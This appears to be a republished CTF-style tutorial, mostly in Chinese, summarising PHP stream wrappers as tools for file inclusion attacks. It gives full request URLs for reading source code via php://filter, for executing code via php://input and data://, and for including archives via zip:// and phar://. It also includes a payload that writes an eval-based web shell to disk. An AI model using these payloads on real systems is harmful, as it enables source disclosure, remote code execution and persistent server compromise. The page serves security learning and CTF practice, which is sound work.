Home > Backend Development > PHP Tutorial > Summary of PHP pseudo-protocol [Welcome to favorites]

Summary of PHP pseudo-protocol [Welcome to favorites]

藏色散人
Release: 2023-04-10 16:44:02
forward
13326 people have browsed it

file:// 协议

  • 条件

    • allow_url_fopen:off/on
    • allow_url_include :off/on
  • 作用
    用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopenallow_url_include的影响。
    include()/require()/include_once()/require_once()参数可控的情况下,如导入为非.php文件,则仍按照php语法进行解析,这是include()函数所决定的。
  • 说明
    file:// 文件系统是 PHP 使用的默认封装协议,展现了本地文件系统。当指定了一个相对路径(不以/、、\或 Windows 盘符开头的路径)提供的路径将基于当前的工作目录。在很多情况下是脚本所在的目录,除非被修改了。使用 CLI 的时候,目录默认是脚本被调用时所在的目录。在某些函数里,例如 fopen()file_get_contents()include_path 会可选地搜索,也作为相对的路径。
  • 用法

    /path/to/file.ext
    relative/path/to/file.ext
    fileInCwd.ext
    C:/path/to/winfile.ext
    C:\path\to\winfile.ext
    \\smbserver\share\path\to\winfile.ext
    file:///path/to/file.ext
    Copy after login
  • 示例

    1. file://[文件的绝对路径和文件名]

      http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
      Copy after login

      Summary of PHP pseudo-protocol [Welcome to favorites]

    2. [文件的相对路径和文件名]

      http://127.0.0.1/include.php?file=./phpinfo.txt
      Copy after login

      Summary of PHP pseudo-protocol [Welcome to favorites]

    3. [http://网络路径和文件名]

      http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
      Copy after login
      Copy after login

      Summary of PHP pseudo-protocol [Welcome to favorites]

  • 参考:http://php.net/manual/zh/wrappers.file.php

php:// 协议

  • 条件

    • allow_url_fopen:off/on
    • allow_url_include :仅php://input php://stdin php://memory php://temp 需要on
  • 作用
    php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filterphp://inputphp://filter用于读取源码php://input用于执行php代码
  • 说明
    PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符,
    内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。

    协议 作用
    php://input 可以访问请求的原始数据的只读流,在POST请求中访问POST的data部分,在enctype="multipart/form-data" 的时候php://input 是无效的。
    php://output 只写的数据流,允许以 print 和 echo 一样的方式写入到输出缓冲区。
    php://fd (>=5.3.6)允许直接访问指定的文件描述符。例如 php://fd/3 引用了文件描述符 3。
    php://memory php://temp (>=5.1.0)一个类似文件包装器的数据流,允许读写临时数据。两者的唯一区别是 php://memory 总是把数据储存在内存中,而 php://temp 会在内存量达到预定义的限制后(默认是 2MB)存入临时文件中。临时文件位置的决定和 sys_get_temp_dir() 的方式一致。
    php://filter (>=5.0.0)一种元封装器,设计用于数据流打开时的筛选过滤应用。对于一体式(all-in-one)的文件函数非常有用,类似 readfile()file()file_get_contents(),在数据流内容读取之前没有机会应用其他过滤器。
  • php://filterParameter details

    The parameters of this protocol will be passed on the protocol path, multiple parameters Both can be passed on a path. The specific reference is as follows:

    php://filter Parameter Description
    resource= Required. It specifies the data stream you want to filter.
    read= Optional. You can set one or more filter names, separated by pipe characters (*\ *).
    write= Optional. You can set one or more filter names, separated by pipe characters (\ ).
    Anything not ending with read= or write= The prefixed filter list is applied to the read or write chain as appropriate.
  • Available filter list (4 categories)

    The main filter types are listed here. For details, please refer to: https://www.php.net/manual/zh/filters.php

    ##string.rot13 is equivalent to string.toupper is equivalent to ##string.tolower strtolower()string.strip_tagsstrip_tags()
    String filtering Device Function
    str_rot13(), rot13 transformation
    strtoupper(), converted to uppercase letters
    is equivalent to , converted to lowercase letters
    is equivalent to , remove html, PHP language tags
    ##Conversion filterFunctionconvert.base64-encode & convert.base64-decodeEquivalent to and convert.quoted-printable-encode & convert.quoted-printable-decodequoted-printable string and 8-bit string encoding and decoding
    base64_encode()base64_decode() , base64 encoding and decoding
    Compression filterFunctionzlib.deflate & zlib.inflateMethod to create a gzip-compatible file in the local file system, but does not generate the header and trailer information of command line tools such as gzip. Just compress and decompress the payload part of the data stream. bzip2.compress & bzip2.decompressSame as above, how to create bz2 compatible files in the local file system.
    ##Encryption filterFunctionmcrypt.*libmcrypt Symmetric encryption algorithmlibmcrypt Symmetric decryption algorithm
    mdecrypt.*
  • 示例

    1. php://filter/read=convert.base64-encode/resource=[文件名]读取文件源码(针对php文件需要base64编码)

      http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
      Copy after login

      Summary of PHP pseudo-protocol [Welcome to favorites]

    2. php://input + [POST DATA]执行php代码

      http://127.0.0.1/include.php?file=php://input
      [POST DATA部分]
      <?php  phpinfo(); ?>
      Copy after login

      Summary of PHP pseudo-protocol [Welcome to favorites]

      若有写入权限,写入一句话木马

      http://127.0.0.1/include.php?file=php://input
      [POST DATA部分]
      <?php  fputs(fopen(&#39;1juhua.php&#39;,&#39;w&#39;),&#39;<?php @eval($_GET[cmd]); ?>'); ?>
      Copy after login

      Summary of PHP pseudo-protocol [Welcome to favorites]

  • 参考:https://php.net/manual/zh/wrappers.php.php
  • zip:// & bzip2:// & zlib:// 协议

    • 条件

      • allow_url_fopen:off/on
      • allow_url_include :off/on
    • 作用zip:// & bzip2:// & zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀:jpg png gif xxx 等等。
    • 示例

      1. zip://[压缩文件绝对路径]%23[压缩文件内的子文件名](#编码为%23)

        压缩 phpinfo.txt 为 phpinfo.zip ,压缩包重命名为 phpinfo.jpg ,并上传

        http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt
        Copy after login

        Summary of PHP pseudo-protocol [Welcome to favorites]

      2. compress.bzip2://file.bz2

        压缩 phpinfo.txt 为 phpinfo.bz2 并上传(同样支持任意后缀名)

        http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2
        Copy after login

        Summary of PHP pseudo-protocol [Welcome to favorites]

      3. compress.zlib://file.gz

        压缩 phpinfo.txt 为 phpinfo.gz 并上传(同样支持任意后缀名)

        http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz
        Copy after login

        Summary of PHP pseudo-protocol [Welcome to favorites]

    • 参考:http://php.net/manual/zh/wrappers.compression.php

    data:// 协议

    • 条件

      • allow_url_fopen:on
      • allow_url_include :on
    • 作用:自PHP>=5.2.0起,可以使用data://数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。
    • 用法

      data://text/plain,
      data://text/plain;base64,
      Copy after login
    • 示例

      1. data://text/plain,

        http://127.0.0.1/include.php?file=data://text/plain,<?php %20phpinfo();?>
        Copy after login

        Summary of PHP pseudo-protocol [Welcome to favorites]

      2. data://text/plain;base64,

        http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
        Copy after login

        Summary of PHP pseudo-protocol [Welcome to favorites]

    http:// & https:// 协议

    • 条件

      • allow_url_fopen:on
      • allow_url_include :on
    • 作用:常规 URL 形式,允许通过 HTTP 1.0 的 GET方法,以只读访问文件或资源。CTF中通常用于远程包含。
    • 用法

      http://example.com
      http://example.com/file.php?var1=val1&var2=val2
      http://user:password@example.com
      https://example.com
      https://example.com/file.php?var1=val1&var2=val2
      https://user:password@example.com
      Copy after login
    • 示例

      http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
      Copy after login
      Copy after login

      Summary of PHP pseudo-protocol [Welcome to favorites]

    phar:// 协议

    phar://协议与zip://类似,同样可以访问zip格式压缩包内容,在这里只给出一个示例:

    http://127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt
    Copy after login

    Summary of PHP pseudo-protocol [Welcome to favorites]

    另外在 Black Hat 2018 大会上,研究人员公布了一款针对PHP应用程序的全新攻击技术:phar://协议对象注入技术

    因为该利用点需要满足一定的条件才能利用,可以参考下面这篇文章,里面的demo也非常详细,留作以后专门研究一下。

The above is the detailed content of Summary of PHP pseudo-protocol [Welcome to favorites]. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:segmentfault.com
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template